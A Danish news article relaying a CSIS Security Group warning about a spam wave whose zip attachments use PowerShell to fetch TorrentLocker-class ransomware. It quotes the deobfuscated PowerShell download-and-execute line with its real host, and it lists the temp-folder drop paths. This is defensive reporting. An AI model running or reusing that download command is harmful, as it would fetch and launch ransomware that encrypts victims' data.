Det danske sikkerhedsselskab CSIS Security Group har flere timer torsdag i denne uge registreret en vedvarende, massiv spambølge rettet specifikt mod danske e-mailadresser.
Spambølgen kommer med et vedhæftet zip-arkiv, der kan gøre stor skade på modtagerens computer.
Skaden sker, hvis mail-modtageren åbner og aktiverer det vedhæftede zip-arkiv, der via Windows' PowerShell-framework vil hente ransomware iTorrentlocker-klassen, oplyser CSIS Security Group.
Sikkerhedsselskabet forklarer, at ransomwaren hentes fra to specifikke domæner, hvorfra der sendes inficeret JavaScript.
"Powershell koden ser ud som følgende i deobfuskeret form: DownloadFile(''http://nathanaylett.com/syst.vcx'',$path) Set-ExecutionPolicy Bypass -Scope Process; $path=($env:t+$mqedu+yzahe.exe'')." skriver CSIS Security Group i sin sikkerhedsadvarsel.
Sådan forløber angrebet
I CSIS Security Groups interne mail-beskyttelsesprogram er sikkerhedsniveauet hævet til 4 på en skala, hvor 5 er det højeste.
Sikkerhedsselskabet forklarer, at hvis ransomwaren får adgang til mail-modtagerens computer, vil koden kopiere sig på følgende lokationer:
C:\Users\[%brugerkonto%]\AppData\Local\Temp\985611.jse
C:\Users\[%brugerkonto%]\AppData\Local\Temp\ysyne.exe
"Den pågældende ransomware vil dernæst i vanlig stil begynde at kryptere data lokalt og på alle tilgængelige netværksdrev," lyder advarslen.
Derfor bør alle være ekstra opmærksomme, når de modtager mails med vedhæftede filer, obskure links og beskeder fra ukendte adresser.
Læs også:
Ransomware as a service boomer: Så nemt kan menigmand angribe dig med ransomware
Alvorlig afsløring: Halvdelen af alle ransomware-ofre ender med at betale løsepenge